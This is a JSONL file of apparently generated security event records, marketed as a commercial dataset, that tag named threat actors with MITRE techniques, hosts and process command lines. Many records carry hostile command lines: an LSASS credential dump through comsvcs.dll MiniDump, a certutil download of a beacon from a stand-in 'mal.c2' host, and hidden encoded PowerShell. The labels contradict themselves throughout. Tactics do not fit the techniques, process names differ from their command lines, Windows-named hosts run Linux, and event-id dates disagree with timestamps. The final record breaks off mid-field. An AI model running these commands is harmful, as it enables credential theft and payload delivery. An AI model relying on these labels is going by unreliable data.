{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Privilege Escalation","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20260726T213256000Z_0007543","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.102.139.27","name":"EC2-INST-OEYP6PI5JJ","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7543APT41T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.108.214.91","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2808 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-07-23T01:21:44.000Z","user":{"name":"azuread\\m76akys8zm13","sid":"S-1-5-21-404705045-157160650-9676"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20251016T132658000Z_0007545","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.242.159.129","name":"IAM-ROLE-SVQBO6XGKQ","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7545FIN7T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.92.30.155","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3908 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-05-22T08:58:51.000Z","user":{"name":"arn:aws:iam::94e91x3mzbqq","sid":"S-1-5-21-654808975-707903440-5645"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20260610T080151000Z_0007547","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.42.10.165","name":"WIN-FIN-SRV-JYLGZFYT07","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7547Lapsus$T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.24.152.48","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1406 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-03-21T10:09:48.000Z","user":{"name":"CORP\\j7tj9mpk8cw8","sid":"S-1-5-21-657520741-614507915-7666"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Execution"],"technique_id":"T1531"},"event_id":"evt_fin7_20260502T012542000Z_0007549","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.1.0.232","name":"DB-ORACLE-GR8X5QUI3L","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7549FIN7T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.171.178.47","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1803 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-25T00:59:43.000Z","user":{"name":"i-sg05o9974wri","sid":"S-1-5-21-564788624-136820250-7422"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Command and Control","Discovery"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20250326T045118000Z_0007551","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.251.117.249","name":"WIN-FIN-SRV-9HPD6OCWRJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7551UNC4841T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.6.70.115","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2932 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-07-21T06:17:25.000Z","user":{"name":"CORP\\vsna71f3qi3h","sid":"S-1-5-21-227857068-120284010-7033"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact"],"technique_id":"T1531"},"event_id":"evt_unc4841_20261119T152136000Z_0007553","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.128.12.132","name":"WIN-FIN-SRV-4UOO9IQAHP","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7553UNC4841T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.67.134.148","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-03-16T11:33:15.000Z","user":{"name":"arn:aws:iam::nz7pa9hqejcw","sid":"S-1-5-21-481121264-857269381-8928"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Defense Evasion","Initial Access","Collection"],"technique_id":"T1570"},"event_id":"evt_unc4841_20260521T203234000Z_0007555","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.68.92.25","name":"APP-WEB-0YZ6PT8JXB","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7555UNC4841T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.170.111.130","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3866 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-28T12:33:30.000Z","user":{"name":"azuread\\8w5d4a2z0b3m","sid":"S-1-5-21-758839312-418907554-6934"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Discovery"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20260926T115009000Z_0007557","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.245.106.123","name":"EC2-INST-PNU4X0A99O","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7557APT29T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.29.124.5","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2250 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-13T17:14:20.000Z","user":{"name":"i-n508pt2ny2xh","sid":"S-1-5-21-989635305-563133378-4491"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Reconnaissance","Execution"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20250515T115248000Z_0007559","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.244.100.110","name":"IAM-ROLE-L41MQR5S05","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7559Scattered SpiderT1059.001"},"network":{"domain":"github.com","dst_ip":"1.53.46.236","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2514 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-06T04:09:20.000Z","user":{"name":"CORP\\w8rlmjxuy0rd","sid":"S-1-5-21-203879316-948099123-7934"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250221T013212000Z_0007561","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.226.146.96","name":"AZURE-VM-G97V4EQ3N4","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7561Lapsus$T1098.004"},"network":{"domain":"github.com","dst_ip":"1.166.192.166","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-05-30T23:23:31.000Z","user":{"name":"azuread\\ynew2lkvrifg","sid":"S-1-5-21-295951126-153283945-7756"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Collection"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20260909T194236000Z_0007563","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.19.188.210","name":"APP-WEB-Q9TACB8RTW","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7563UNC4841T1059.001"},"network":{"domain":"github.com","dst_ip":"1.186.240.16","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-01T11:40:36.000Z","user":{"name":"svc_gflkcflsiotw","sid":"S-1-5-21-210708845-875325116-9053"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Execution"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20260610T081540000Z_0007565","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.255.3.246","name":"WIN-FIN-SRV-P46HXLO1PN","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7565Volt TyphoonT1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.131.216.33","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-07T18:46:37.000Z","user":{"name":"azuread\\5xe5nm8jpryr","sid":"S-1-5-21-204509948-820179669-2482"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Lateral Movement","Execution"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20260115T154420000Z_0007567","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.235.220.120","name":"AZURE-VM-9KT12RJW7Q","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7567APT41T1021.006"},"network":{"domain":"github.com","dst_ip":"1.8.215.171","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-30T12:54:12.000Z","user":{"name":"CORP\\uy36pp2tc0ny","sid":"S-1-5-21-261891360-976898702-1107"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Privilege Escalation","Collection","Persistence"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20250116T120102000Z_0007569","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.99.250.76","name":"EC2-INST-8F332IXPNR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7569Mustang PandaT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.170.201.163","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1915 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-01-01T08:23:22.000Z","user":{"name":"svc_pxqzh4yjm5jd","sid":"S-1-5-21-122051105-188181673-3347"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery","Persistence","Credential Access"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20261121T072807000Z_0007571","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.41.211.140","name":"APP-WEB-9EZX76SNG4","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7571Volt TyphoonT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.63.79.88","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 613 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-04T07:09:26.000Z","user":{"name":"azuread\\ktnehdoydwjk","sid":"S-1-5-21-130874490-385917368-2874"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access","Persistence","Collection"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20261122T090248000Z_0007573","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.174.53.188","name":"IAM-ROLE-19VXNP4I7V","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7573Lapsus$T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.42.217.37","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2422 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-18T04:22:02.000Z","user":{"name":"azuread\\iu9wx4133645","sid":"S-1-5-21-518943677-755851738-8185"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access","Persistence"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20250524T023058000Z_0007575","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.29.147.252","name":"IAM-ROLE-JZAC60HEMX","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7575APT41T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.129.115.235","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-06-19T11:54:02.000Z","user":{"name":"i-6b1civ9gi6r0","sid":"S-1-5-21-539880917-655684552-9196"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Defense Evasion","Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20260207T123032000Z_0007577","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.64.113.210","name":"APP-WEB-T9YOL7AVXQ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7577Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.38.224.100","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2245 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-07-17T18:28:10.000Z","user":{"name":"svc_a4aevhkfu86s","sid":"S-1-5-21-621550867-440406403-8780"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Credential Access","Initial Access"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250429T171042000Z_0007579","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.232.22.146","name":"AZURE-VM-JGWQA6UXIC","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7579UNC4841T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.176.128.21","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-31T15:12:22.000Z","user":{"name":"CORP\\hj70olnn2apd","sid":"S-1-5-21-491580662-452460991-6014"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration","Persistence"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20250217T091233000Z_0007581","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.189.146.214","name":"AZURE-VM-9E3ZWS5KPN","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7581Scattered SpiderT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.106.195.207","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-09-14T06:22:44.000Z","user":{"name":"azuread\\v930vu49mtox","sid":"S-1-5-21-426589421-572300797-9484"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Privilege Escalation","Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20260521T024527000Z_0007583","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.45.94.49","name":"IAM-ROLE-A15FA7YZTE","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7583FIN7T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.100.195.115","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-11T14:02:17.000Z","user":{"name":"CORP\\xxrpso6ekp2u","sid":"S-1-5-21-347785252-168602817-9135"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery","Collection"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20260930T012011000Z_0007585","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.5.137.217","name":"AZURE-VM-6I1332K1TB","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7585APT41T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.104.228.9","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-04-08T08:35:03.000Z","user":{"name":"arn:aws:iam::w5cachacaj43","sid":"S-1-5-21-875280673-374455038-4021"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20251213T063659000Z_0007587","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.112.125.215","name":"APP-WEB-U8L5RZU57R","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7587Lapsus$T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.47.226.189","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3067 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-22T18:35:12.000Z","user":{"name":"CORP\\bz8r6w4jt2d6","sid":"S-1-5-21-714045123-135840487-8475"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Execution"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20260330T011634000Z_0007589","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.93.190.111","name":"APP-WEB-S4Y74FVNJS","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7589Scattered SpiderT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.160.132.209","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Windows Security 